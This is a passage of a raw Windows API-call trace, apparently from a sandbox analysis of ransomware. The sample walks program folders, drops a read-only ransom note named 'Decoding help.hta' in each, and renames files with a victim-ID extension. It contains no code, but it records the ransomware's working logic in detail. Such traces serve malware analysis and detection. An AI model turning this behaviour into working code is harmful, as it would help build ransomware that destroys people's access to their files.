[0041.474] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\*.*") returned 50 [0041.474] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\", lpString2="Ole DB" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB" [0041.474] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\*.*" [0041.474] GlobalMemoryStatus (in: lpBuffer=0xc44fd10 | out: lpBuffer=0xc44fd10) [0041.474] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x93280b0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x2f0 [0041.475] CloseHandle (hObject=0x2f0) returned 1 [0041.475] FindNextFileW (in: hFindFile=0x5a6070, lpFindFileData=0xc44fd30 | out: lpFindFileData=0xc44fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8c2406d7, ftCreationTime.dwHighDateTime=0x1ca0413, ftLastAccessTime.dwLowDateTime=0x8c2406d7, ftLastAccessTime.dwHighDateTime=0x1ca0413, ftLastWriteTime.dwLowDateTime=0xb04ef6b0, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0xad000, dwReserved0=0x0, dwReserved1=0x0, cFileName="wab32.dll", cAlternateFileName="")) returned 1 [0041.475] lstrcpyW (in: lpString1=0x42c4878, lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\*.*" [0041.475] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\*.*") returned 50 [0041.475] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Decoding help.hta" [0041.475] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Decoding help.hta" (normalized: "c:\\program files (x86)\\common files\\system\\decoding help.hta")) returned 0x1 [0041.475] lstrcmpiW (lpString1="Decoding help.hta", lpString2="wab32.dll") returned -1 [0041.475] lstrlenW (lpString="wab32.dll") returned 9 [0041.475] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\*.*" [0041.475] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\*.*") returned 50 [0041.475] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\", lpString2="wab32.dll" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\wab32.dll") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\wab32.dll" [0041.476] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\wab32.dll" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\wab32.dll") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\wab32.dll" [0041.476] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\wab32.dll", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\wab32.dll.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\wab32.dll.[ID]g9uZrLhJaygpwRm1[ID]" [0041.476] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\wab32.dll" (normalized: "c:\\program files (x86)\\common files\\system\\wab32.dll"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\wab32.dll.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\common files\\system\\wab32.dll.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0041.476] FindNextFileW (in: hFindFile=0x5a6070, lpFindFileData=0xc44fd30 | out: lpFindFileData=0xc44fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8d4d923a, ftCreationTime.dwHighDateTime=0x1ca0413, ftLastAccessTime.dwLowDateTime=0x8d4d923a, ftLastAccessTime.dwHighDateTime=0x1ca0413, ftLastWriteTime.dwLowDateTime=0xf37f6470, ftLastWriteTime.dwHighDateTime=0x1ca041f, nFileSizeHigh=0x0, nFileSizeLow=0x10c400, dwReserved0=0x0, dwReserved1=0x0, cFileName="wab32res.dll", cAlternateFileName="")) returned 1 [0041.476] lstrcpyW (in: lpString1=0x42c4878, lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\*.*" [0041.476] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\*.*") returned 50 [0041.476] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Decoding help.hta" [0041.476] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Decoding help.hta" (normalized: "c:\\program files (x86)\\common files\\system\\decoding help.hta")) returned 0x1 [0041.476] lstrcmpiW (lpString1="Decoding help.hta", lpString2="wab32res.dll") returned -1 [0041.476] lstrlenW (lpString="wab32res.dll") returned 12 [0041.476] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\*.*" [0041.476] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\*.*") returned 50 [0041.476] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\", lpString2="wab32res.dll" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\wab32res.dll") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\wab32res.dll" [0041.476] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\wab32res.dll" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\wab32res.dll") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\wab32res.dll" [0041.476] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\wab32res.dll", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\wab32res.dll.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\wab32res.dll.[ID]g9uZrLhJaygpwRm1[ID]" [0041.476] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\wab32res.dll" (normalized: "c:\\program files (x86)\\common files\\system\\wab32res.dll"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\wab32res.dll.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\common files\\system\\wab32res.dll.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0041.476] FindNextFileW (in: hFindFile=0x5a6070, lpFindFileData=0xc44fd30 | out: lpFindFileData=0xc44fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8d4d923a, ftCreationTime.dwHighDateTime=0x1ca0413, ftLastAccessTime.dwLowDateTime=0x8d4d923a, ftLastAccessTime.dwHighDateTime=0x1ca0413, ftLastWriteTime.dwLowDateTime=0xf37f6470, ftLastWriteTime.dwHighDateTime=0x1ca041f, nFileSizeHigh=0x0, nFileSizeLow=0x10c400, dwReserved0=0x0, dwReserved1=0x0, cFileName="wab32res.dll", cAlternateFileName="")) returned 0 [0041.476] FindClose (in: hFindFile=0x5a6070 | out: hFindFile=0x5a6070) returned 1 Thread: id = 140 os_tid = 0x8a4 [0040.222] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\*.*", lpFindFileData=0xc58fd30 | out: lpFindFileData=0xc58fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80046d91, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x9f0852f1, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0x9f0852f1, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5d7f50 [0040.759] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0040.759] FindNextFileW (in: hFindFile=0x5d7f50, lpFindFileData=0xc58fd30 | out: lpFindFileData=0xc58fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80046d91, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x9f0852f1, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0x9f0852f1, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0040.759] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0040.759] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0040.759] FindNextFileW (in: hFindFile=0x5d7f50, lpFindFileData=0xc58fd30 | out: lpFindFileData=0xc58fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x93dab239, ftCreationTime.dwHighDateTime=0x1ca0419, ftLastAccessTime.dwLowDateTime=0x93dab239, ftLastAccessTime.dwHighDateTime=0x1ca0419, ftLastWriteTime.dwLowDateTime=0x68934cfd, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x30e4, dwReserved0=0x0, dwReserved1=0x0, cFileName="Common.fxh", cAlternateFileName="")) returned 1 [0041.120] lstrcpyW (in: lpString1=0x10cfea08, lpString2="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\*.*") returned="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\*.*" [0041.120] lstrlenW (lpString="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\*.*") returned 41 [0041.120] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\Decoding help.hta" [0041.120] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\Decoding help.hta" (normalized: "c:\\program files\\dvd maker\\shared\\decoding help.hta")) returned 0xffffffff [0041.120] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\Decoding help.hta" (normalized: "c:\\program files\\dvd maker\\shared\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x30c [0041.129] WriteFile (in: hFile=0x30c, lpBuffer=0x403006*, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0xc58fcf8, lpOverlapped=0x0 | out: lpBuffer=0x403006*, lpNumberOfBytesWritten=0xc58fcf8*=0x78e, lpOverlapped=0x0) returned 1 [0041.130] CloseHandle (hObject=0x30c) returned 1 [0041.130] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\Decoding help.hta", dwFileAttributes=0x1) returned 1 [0041.130] lstrcmpiW (lpString1="Decoding help.hta", lpString2="Common.fxh") returned 1 [0041.130] lstrlenW (lpString="Common.fxh") returned 10 [0041.131] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\*.*") returned="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\*.*" [0041.131] lstrlenW (lpString="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\*.*") returned 41 [0041.131] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\", lpString2="Common.fxh" | out: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\Common.fxh") returned="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\Common.fxh" [0041.131] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\Common.fxh" | out: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\Common.fxh") returned="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\Common.fxh" [0041.131] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\Common.fxh", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\Common.fxh.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\Common.fxh.[ID]g9uZrLhJaygpwRm1[ID]" [0041.131] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\Common.fxh" (normalized: "c:\\program files\\dvd maker\\shared\\common.fxh"), lpNewFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\Common.fxh.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\dvd maker\\shared\\common.fxh.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0041.131] FindNextFileW (in: hFindFile=0x5d7f50, lpFindFileData=0xc58fd30 | out: lpFindFileData=0xc58fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x93d12cc5, ftCreationTime.dwHighDateTime=0x1ca0419, ftLastAccessTime.dwLowDateTime=0x93d12cc5, ftLastAccessTime.dwHighDateTime=0x1ca0419, ftLastWriteTime.dwLowDateTime=0x6895ae5b, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x6d1f, dwReserved0=0x0, dwReserved1=0x0, cFileName="DissolveAnother.png", cAlternateFileName="")) returned 1 [0041.131] lstrcpyW (in: lpString1=0x5fa90f0, lpString2="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\*.*") returned="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\*.*" [0041.131] lstrlenW (lpString="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\*.*") returned 41 [0041.131] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\Decoding help.hta" [0041.131] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\Decoding help.hta" (normalized: "c:\\program files\\dvd maker\\shared\\decoding help.hta")) returned 0x1 [0041.131] lstrcmpiW (lpString1="Decoding help.hta", lpString2="DissolveAnother.png") returned -1 [0041.131] lstrlenW (lpString="DissolveAnother.png") returned 19 [0041.131] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\*.*") returned="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\*.*" [0041.131] lstrlenW (lpString="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\*.*") returned 41 [0041.131] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\", lpString2="DissolveAnother.png" | out: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DissolveAnother.png") returned="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DissolveAnother.png" [0041.131] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DissolveAnother.png" | out: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DissolveAnother.png") returned="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DissolveAnother.png" [0041.131] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DissolveAnother.png", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DissolveAnother.png.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DissolveAnother.png.[ID]g9uZrLhJaygpwRm1[ID]" [0041.132] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DissolveAnother.png" (normalized: "c:\\program files\\dvd maker\\shared\\dissolveanother.png"), lpNewFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DissolveAnother.png.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\dvd maker\\shared\\dissolveanother.png.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0041.143] FindNextFileW (in: hFindFile=0x5d7f50, lpFindFileData=0xc58fd30 | out: lpFindFileData=0xc58fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x93d38e22, ftCreationTime.dwHighDateTime=0x1ca0419, ftLastAccessTime.dwLowDateTime=0x93d38e22, ftLastAccessTime.dwHighDateTime=0x1ca0419, ftLastWriteTime.dwLowDateTime=0x68980fb9, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xb7835, dwReserved0=0x0, dwReserved1=0x0, cFileName="DissolveNoise.png", cAlternateFileName="")) returned 1 [0041.143] lstrcpyW (in: lpString1=0x42b0868, lpString2="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\*.*") returned="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\*.*" [0041.143] lstrlenW (lpString="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\*.*") returned 41 [0041.143] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\Decoding help.hta" [0041.143] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\Decoding help.hta" (normalized: "c:\\program files\\dvd maker\\shared\\decoding help.hta")) returned 0x1 [0041.143] lstrcmpiW (lpString1="Decoding help.hta", lpString2="DissolveNoise.png") returned -1 [0041.144] lstrlenW (lpString="DissolveNoise.png") returned 17 [0041.144] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\*.*") returned="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\*.*" [0041.144] lstrlenW (lpString="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\*.*") returned 41 [0041.144] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\", lpString2="DissolveNoise.png" | out: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DissolveNoise.png") returned="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DissolveNoise.png" [0041.144] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DissolveNoise.png" | out: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DissolveNoise.png") returned="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DissolveNoise.png" [0041.144] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DissolveNoise.png", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DissolveNoise.png.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DissolveNoise.png.[ID]g9uZrLhJaygpwRm1[ID]" [0041.144] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DissolveNoise.png" (normalized: "c:\\program files\\dvd maker\\shared\\dissolvenoise.png"), lpNewFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DissolveNoise.png.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\dvd maker\\shared\\dissolvenoise.png.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0041.144] FindNextFileW (in: hFindFile=0x5d7f50, lpFindFileData=0xc58fd30 | out: lpFindFileData=0xc58fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9f0852f1, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0xaabb4389, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0xa1ad8615, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="DvdStyles", cAlternateFileName="DVDSTY~1")) returned 1 [0041.144] lstrcmpW (lpString1=".", lpString2="DvdStyles") returned -1 [0041.144] lstrcmpW (lpString1="..", lpString2="DvdStyles") returned -1 [0041.144] lstrcmpiW (lpString1="windows", lpString2="DvdStyles") returned 1 [0041.144] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\*.*") returned="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\*.*" [0041.144] lstrlenW (lpString="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\*.*") returned 41 [0041.144] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\", lpString2="DvdStyles" | out: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles") returned="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles" [0041.144] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\*.*") returned="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\*.*" [0041.144] GlobalMemoryStatus (in: lpBuffer=0xc58fd10 | out: lpBuffer=0xc58fd10) [0041.145] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x4178320, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x134 [0041.151] CloseHandle (hObject=0x134) returned 1 [0041.151] FindNextFileW (in: hFindFile=0x5d7f50, lpFindFileData=0xc58fd30 | out: lpFindFileData=0xc58fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9060745b, ftCreationTime.dwHighDateTime=0x1ca0419, ftLastAccessTime.dwLowDateTime=0x9060745b, ftLastAccessTime.dwHighDateTime=0x1ca0419, ftLastWriteTime.dwLowDateTime=0x4877fc17, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x379f, dwReserved0=0x0, dwReserved1=0x0, cFileName="Filters.xml", cAlternateFileName="")) returned 1 [0041.151] lstrcpyW (in: lpString1=0x42b0868, lpString2="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\*.*") returned="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\*.*" [0041.151] lstrlenW (lpString="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\*.*") returned 41 [0041.151] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\Decoding help.hta" [0041.151] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\Decoding help.hta" (normalized: "c:\\program files\\dvd maker\\shared\\decoding help.hta")) returned 0x1 [0041.151] lstrcmpiW (lpString1="Decoding help.hta", lpString2="Filters.xml") returned -1 [0041.151] lstrlenW (lpString="Filters.xml") returned 11 [0041.152] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\*.*") returned="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\*.*" [0041.152] lstrlenW (lpString="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\*.*") returned 41 [0041.152] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\", lpString2="Filters.xml" | out: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\Filters.xml") returned="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\Filters.xml" [0041.152] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\Filters.xml" | out: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\Filters.xml") returned="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\Filters.xml" [0041.152] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\Filters.xml", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\Filters.xml.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\Filters.xml.[ID]g9uZrLhJaygpwRm1[ID]" [0041.152] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\Filters.xml" (normalized: "c:\\program files\\dvd maker\\shared\\filters.xml"), lpNewFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\Filters.xml.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\dvd maker\\shared\\filters.xml.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0041.152] FindNextFileW (in: hFindFile=0x5d7f50, lpFindFileData=0xc58fd30 | out: lpFindFileData=0xc58fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x93e437ad, ftCreationTime.dwHighDateTime=0x1ca0419, ftLastAccessTime.dwLowDateTime=0x93e437ad, ftLastAccessTime.dwHighDateTime=0x1ca0419, ftLastWriteTime.dwLowDateTime=0x689cd275, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x8edf, dwReserved0=0x0, dwReserved1=0x0, cFileName="Parity.fx", cAlternateFileName="")) returned 1 [0041.152] lstrcpyW (in: lpString1=0x42b0868, lpString2="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\*.*") returned="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\*.*" [0041.152] lstrlenW (lpString="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\*.*") returned 41 [0041.152] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\Decoding help.hta" [0041.152] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\Decoding help.hta" (normalized: "c:\\program files\\dvd maker\\shared\\decoding help.hta")) returned 0x1 [0041.152] lstrcmpiW (lpString1="Decoding help.hta", lpString2="Parity.fx") returned -1 [0041.152] lstrlenW (lpString="Parity.fx") returned 9 [0041.152] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\DVD 